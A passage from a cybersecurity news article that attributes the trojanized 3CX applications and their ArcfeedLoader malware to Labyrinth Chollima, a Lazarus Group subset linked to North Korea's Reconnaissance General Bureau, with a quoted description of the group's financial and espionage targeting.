"The trojanized 3CX applications invoke a variant of ArcfeedLoader, malware uniquely attributed to Labyrinth Chollima."

Labyrinth Chollima, per the Texas-based company, is a subset of the Lazarus Group, which also constitutes Silent Chollima (aka Andariel or Nickel Hyatt) and Stardust Chollima (aka BlueNoroff or Nickel Gladstone).

The group "has been active at least since 2009 and typically tries to generate revenue by targeting crypto and financial organizations," Meyers said, adding it's "likely affiliated with Bureau 121 of the DPRK's Reconnaissance General Bureau (RGB) and primarily conducts espionage operations and revenue generation schemes."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel